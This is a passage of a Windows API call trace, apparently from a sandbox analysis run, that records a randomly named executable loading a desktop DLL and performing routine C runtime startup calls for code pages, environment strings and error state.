returned 0x77f1a295 [0033.970] GetProcAddress (hModule=0x761d0000, lpProcName="DecodePointer") returned 0x77f1cd10 [0033.971] GetCurrentThreadId () returned 0xc58 [0033.971] GetCommandLineA () returned="\"C:\\Windows\\System32\\goRcteXxZX.exe\" /dll=\"C:\\Users\\EEBsYm5\\Desktop\\97328F~1.DLL\" /fn_id=Entry /fn_args=\"DefaultInstall\"" [0033.971] GetEnvironmentStringsW () returned 0x2b78f0* [0033.971] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ALLUSERSPROFILE=C:\\ProgramData", cchWideChar=992, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 992 [0033.971] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ALLUSERSPROFILE=C:\\ProgramData", cchWideChar=992, lpMultiByteStr=0x13909f0, cbMultiByte=992, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ALLUSERSPROFILE=C:\\ProgramData", lpUsedDefaultChar=0x0) returned 992 [0033.971] FreeEnvironmentStringsW (penv=0x2b78f0) returned 1 [0033.971] GetStartupInfoA (in: lpStartupInfo=0x1cf62c | out: lpStartupInfo=0x1cf62c*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\System32\\goRcteXxZX.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0xffffffff, hStdOutput=0xffffffff, hStdError=0xffffffff)) [0033.971] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0033.971] GetStdHandle (nStdHandle=0xfffffff5) returned 0x0 [0033.971] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0033.971] SetHandleCount (uNumber=0x20) returned 0x20 [0033.971] GetLastError () returned 0x0 [0033.971] SetLastError (dwErrCode=0x0) [0033.971] GetLastError () returned 0x0 [0033.971] SetLastError (dwErrCode=0x0) [0033.971] GetLastError () returned 0x0 [0033.971] SetLastError (dwErrCode=0x0) [0033.971] GetACP () returned 0x4e4 [0033.971] GetLastError () returned 0x0 [0033.971] SetLastError (dwErrCode=0x0) [0033.971] IsValidCodePage (CodePage=0x4e4) returned 1 [0033.971] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x1cf60c | out: lpCPInfo=0x1cf60c) returned 1 [0033.971] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x1cf0d8 | out: lpCPInfo=0x1cf0d8) returned 1 [0033.972] GetLastError () returned 0x0 [0033.972] SetLastError (dwErrCode=0x0) [0033.972] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr="", cchSrc=1, lpCharType=0x1cf068 | out: lpCharType=0x1cf068) returned 1 [0033.972] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x1cf4ec, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0033.972] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x1cf4ec, cbMultiByte=256, lpWideCharStr=0x1cee58, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ왈狰Ā") returned 256 [0033.972] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ왈狰Ā", cchSrc=256, lpCharType=0x1cf0ec | out: lpCharType=0x1cf0ec) returned 1 [0033.972] GetLastError () returned 0x0 [0033.972] SetLastError (dwErrCode=0x0) [0033.972] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr="", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 1 [0033.972] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x1cf4ec, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0033.972] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x1cf4ec, cbMultiByte=256, lpWideCharStr=0x1cee28, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0033.972] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 256 [0033.972] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x1cec18, cchDest=256 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0033.972] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchWideChar=256, lpMultiByteStr=0x1cf3ec, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ¶å4÷$ö\x1c", lpUsedDefaultChar=0x0) returned 256 [0033.972] GetLastError () returned 0x0 [0033.972] SetLastError (dwErrCode=0x0) [0033.972] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x1cf4ec, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0033.972] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x1cf4ec, cbMultiByte=256, lpWideCharStr=0x1cee48, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0033.972] LCMapStringW (in: Locale=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 256 [0033.972] LCMapStringW (in: Locale=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x1cec38, cchDest=256 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸĀ") returned 256 [0033.972] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸĀ", cchWideChar=256, lpMultiByteStr=0x1cf2ec, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x8a\x9b\x8c\x9d\x8e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞ\x9f \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ¶å4÷$ö\x1c", lpUsedDefaultChar=0x0) returned 256 [0033.972] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x72f1d9a8, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\goRcteXxZX.exe" (normalized: "c:\\windows\\system32\\gorctexxzx.exe")) returned 0x22 [0033.972] GetLastError () returned 0x0 [0033.972] SetLastError (dwErrCode=0x0) [0033.972] GetLastError () returned 0x0 [0033.972] SetLastError (dwErrCode=0x0) [0033.972] GetLastError () returned 0x0 [0033.972] SetLastError (dwErrCode=0x0) [0033.972] GetLastError () returned 0x0 [0033.972] SetLastError (dwErrCode=0x0) [0033.972] GetLastError () returned 0x0 [0033.972] SetLastError (dwErrCode=0x0) [0033.972] GetLastError () returned 0x0 [0033.973] SetLastError (dwErrCode=0x0) [0033.973] GetLastError () returned 0x0 [0033.973] SetLastError (dwErrCode=0x0) [0033.973] GetLastError () returned 0x0 [0033.973] SetLastError (dwErrCode=0x0) [0033.973] GetLastError () returned 0x0 [0033.973] SetLastError (dwErrCode=0x0) [0033.973] GetLastError () returned 0x0 [0033.973] SetLastError (dwErrCode=0x0) [0033.973] GetLastError () returned 0x0 [0033.973] SetLastError (dwErrCode=0x0) [0033.973] GetLastError () returned 0x0 [0033.973] SetLastError (dwErrCode=0x0) [0033.973] GetLastError () returned 0x0 [0033.973] SetLastError (dwErrCode=0x0) [0033.973] GetLastError () returned 0x0 [0033.973] SetLastError (dwErrCode=0x0) [0033.973] GetLastError () returned 0x0 [0033.973] SetLastError (dwErrCode=0x0) [0033.973] GetLastError () returned 0x0 [0033.973] SetLastError (dwErrCode=0x0) [0033.973] GetLastError () returned 0x0 [0033.973] SetLastError (dwErrCode=0x0) [0033.973] GetLastError () returned 0x0 [0033.973] SetLastError (dwErrCode=0x0) [0033.973] GetLastError () returned 0x0 [0033.973] SetLastError (dwErrCode=0x0) [0033.973] GetLastError () returned 0x0 [0033.973] SetLastError (dwErrCode=0x0) [0033.973] GetLastError () returned 0x0 [0033.973] SetLastError (dwErrCode=0x0) [0033.973] GetLastError () returned 0x0 [0033.973] SetLastError (dwErrCode=0x0) [0033.973] GetLastError () returned 0x0 [0033.974] SetLastError (dwErrCode=0x0) [0033.974] GetLastError () returned 0x0 [0033.974] SetLastError (dwErrCode=0x0) [0033.974] GetLastError () returned 0x0 [0033.974] SetLastError (dwErrCode=0x0) [0033.974] GetLastError () returned 0x0 [0033.974] SetLastError (dwErrCode=0x0) [0033.974] GetLastError () returned 0x0 [0033.974] SetLastError (dwErrCode=0x0) [0033.974] GetLastError () returned 0x0 [0033.974] SetLastError (dwErrCode=0x0) [0033.974] GetLastError () returned 0x0 [0033.974] SetLastError (dwErrCode=0x0) [0033.974] GetLastError () returned 0x0 [0033.974] SetLastError (dwErrCode=0x0) [0033.974] GetLastError () returned 0x0 [0033.974] SetLastError (dwErrCode=0x0) [0033.974] GetLastError () returned 0x0 [0033.974] SetLastError (dwErrCode=0x0) [0033.974] GetLastError () returned 0x0 [0033.974] SetLastError (dwErrCode=0x0) [0033.974] GetLastError () returned 0x0 [0033.974] SetLastError (dwErrCode=0x0) [0033.974] GetLastError () returned 0x0 [0033.974] SetLastError (dwErrCode=0x0) [0033.974] GetLastError () returned 0x0 [0033.974] SetLastError (dwErrCode=0x0) [0033.974] GetLastError () returned 0x0 [0033.974] SetLastError (dwErrCode=0x0) [0033.974] GetLastError () returned 0x0 [0033.974] SetLastError (dwErrCode=0x0) [0033.974] GetLastError () returned 0x0 [0033.974] SetLastError (dwErrCode=0x0) [0033.974] GetLastError () returned 0x0 [0033.975] SetLastError (dwErrCode=0x0) [0033.975] GetLastError () returned 0x0 [0033.975] SetLastError (dwErrCode=0x0) [0033.975] GetLastError () returned 0x0 [0033.975] SetLastError (dwErrCode=0x0) [0033.975] GetLastError () returned 0x0 [0033.975] SetLastError (dwErrCode=0x0) [0033.975] GetLastError () returned 0x0 [0033.975] SetLastError (dwErrCode=0x0) [0033.975] GetLastError () returned 0x0 [0033.975] SetLastError (dwErrCode=0x0) [0033.975] GetLastError () returned 0x0 [0033.975] SetLastError (dwErrCode=0x0) [0033.975] GetLastError () returned 0x0 [0033.975] SetLastError (dwErrCode=0x0) [0033.975] GetLastError () returned 0x0 [0033.975] SetLastError (dwErrCode=0x0) [0033.975] GetLastError () returned 0x0 [0033.975] SetLastError (dwErrCode=0x0) [0033.975] GetLastError () returned 0x0 [0033.975] SetLastError (dwErrCode=0x0) [0033.975] GetLastError () returned 0x0 [0033.975] SetLastError (dwErrCode=0x0) [0033.975] GetLastError () returned 0x0 [0033.975] SetLastError (dwErrCode=0x0) [0033.975] GetLastError () returned 0x0 [0033.975] SetLastError (dwErrCode=0x0) [0033.975] GetLastError () returned 0x0 [0033.975] SetLastError (dwErrCode=0x0) [0033.975] GetLastError () returned 0x0 [0033.975] SetLastError (dwErrCode=0x0) [0033.975] GetLastError () returned 0x0 [0033.975] SetLastError (dwErrCode=0x0) [0033.975] GetLastError () returned 0x0 [0033.976] SetLastError (dwErrCode=0x0) [0033.976] GetLastError () returned 0x0 [0033.976] SetLastError (dwErrCode=0x0) [0033.976] GetLastError () returned 0x0 [0033.976] SetLastError (dwErrCode=0x0) [0033.976] GetLastError () returned 0x0 [0033.977] SetLastError (dwErrCode=0x0) [0033.977] GetLastError () returned 0x0 [0033.977] SetLastError (dwErrCode=0x0) [0033.977] GetLastError () returned 0x0 [0033.977] SetLastError (dwErrCode=0x0) [0033.977] GetLastError () returned 0x0 [0033.977] SetLastError (dwErrCode=0x0) [0033.977] GetLastError () returned 0x0 [0033.977] SetLastError (dwErrCode=0x0) [0033.977] GetLastError () returned 0x0 [0033.978] SetLastError (dwErrCode=0x0) [0033.978] GetLastError () returned 0x0 [0033.978] SetLastError (dwErrCode=0x0) [0033.978] GetLastError () returned 0x0 [0033.978] SetLastError (dwErrCode=0x0) [0033.978] GetLastError () returned 0x0 [0033.978] SetLastError (dwErrCode=0x0) [0033.978] GetLastError () returned 0x0 [0033.978] SetLastError (dwErrCode=0x0) [0033.978] GetLastError () returned 0x0 [0033.978] SetLastError (dwErrCode=0x0) [0033.978] GetLastError () returned 0x0 [0033.978] SetLastError (dwErrCode=0x0) [0033.978] GetLastError () returned 0x0 [0033.978] SetLastError (dwErrCode=0x0) [0033.978] GetLastError () returned 0x0 [0033.978] SetLastError (dwErrCode=0x0) [0033.978] GetLastError () returned 0x0 [0033.978] SetLastError (dwErrCode=0x0) [0033.978] GetLastError () returned 0x0 [0033.978] SetLastError (dwErrCode=0x0) [0033.978] GetLastError () returned 0x0 [0033.978] SetLastError (dwErrCode=0x0) [0033.978] GetLastError () returned 0x0 [0033.978] SetLastError (dwErrCode=0x0) [0033.978] GetLastError () returned 0x0 [0033.978] SetLastError (dwErrCode=0x0) [0033.978] GetLastError () returned 0x0 [0033.978] SetLastError (dwErrCode=0x0) [0033.978] GetLastError () returned 0x0 [0033.978] SetLastError (dwErrCode=0x0) [0033.978] GetLastError () returned 0x0 [0033.978] SetLastError (dwErrCode=0x0) [0033.978] GetLastError () returned 0x0 [0033.978] SetLastError (dwErrCode=0x0) [0033.979] GetLastError () returned 0x0 [0033.979] SetLastError (dwErrCode=0x0) [0033.979] GetLastError () returned 0x0 [0033.979] SetLastError (dwErrCode=0x0) [0033.979] GetLastError () returned 0x0 [0033.979] SetLastError (dwErrCode=0x0) [0033.979] GetLastError () returned 0x0 [0033.979] SetLastError (dwErrCode=0x0) [0033.979] GetLastError () returned 0x0 [0033.979] SetLastError (dwErrCode=0x0) [0033.979] GetLastError () returned 0x0 [0033.979] SetLastError (dwErrCode=0x0) [0033.979] GetLastError () returned 0x0 [0033.979] SetLastError (dwErrCode=0x0) [0033.979] GetLastError () returned 0x0 [0033.979] SetLastError (dwErrCode=0x0) [0033.979] GetLastError () returned 0x0 [0033.979] SetLastError (dwErrCode=0x0) [0033.979] GetLastError () returned 0x0 [0033.979] SetLastError (dwErrCode=0x0) [0033.979] GetLastError () returned 0x0 [0033.979] SetLastError (dwErrCode=0x0) [0033.979] GetLastError () returned 0x0 [0033.979] SetLastError (dwErrCode=0x0) [0033.979] GetLastError () returned 0x0 [0033.979] SetLastError (dwErrCode=0x0) [0033.979] GetLastError () returned 0x0 [0033.979] SetLastError (dwErrCode=0x0) [0033.979] GetLastError () returned 0x0 [0033.979] SetLastError (dwErrCode=0x0) [0033.979] GetLastError () returned 0x0 [0033.979] SetLastError (dwErrCode=0x0) [0033.979] GetLastError () returned 0x0 [0033.979] SetLastError (dwErrCode=0x0) [0033.980] GetLastError () returned 0x0 [0033.980] SetLastError (dwErrCode=0x0) [0033.980] GetLastError () returned 0x0 [0033.980] SetLastError (dwErrCode=0x0) [0033.980] GetLastError () returned 0x0 [0033.980] SetLastError (dwErrCode=0x0) [0033.980] GetLastError () returned 0x0 [0033.980] SetLastError (dwErrCode=0x0) [0033.980] GetLastError () returned 0x0 [0033.980] SetLastError (dwErrCode=0x0) [0033.980] GetLastError () returned 0x0 [0033.980] SetLastError (dwErrCode=0x0) [0033.980] GetLastError () returned 0x0 [0033.980] SetLastError (dwErrCode=0x0) [0033.980] GetLastError () returned 0x0 [0033.980] SetLastError (dwErrCode=0x0) [0033.980] GetLastError () returned 0x0 [0033.980] SetLastError (dwErrCode=0x0) [0033.980] GetLastError () returned 0x0 [0033.980] SetLastError (dwErrCode=0x0) [0033.980] GetLastError () returned 0x0 [0033.980] SetLastError (dwErrCode=0x0) [0033.980] GetLastError () returned 0x0 [0033.980] SetLastError (dwErrCode=0x0) [0033.980] GetLastError () returned 0x0 [0033.980] SetLastError (dwErrCode=0x0) [0033.980] GetLastError () returned 0x0 [0033.980] SetLastError (dwErrCode=0x0) [0033.980] GetLastError () returned 0x0 [0033.980] SetLastError 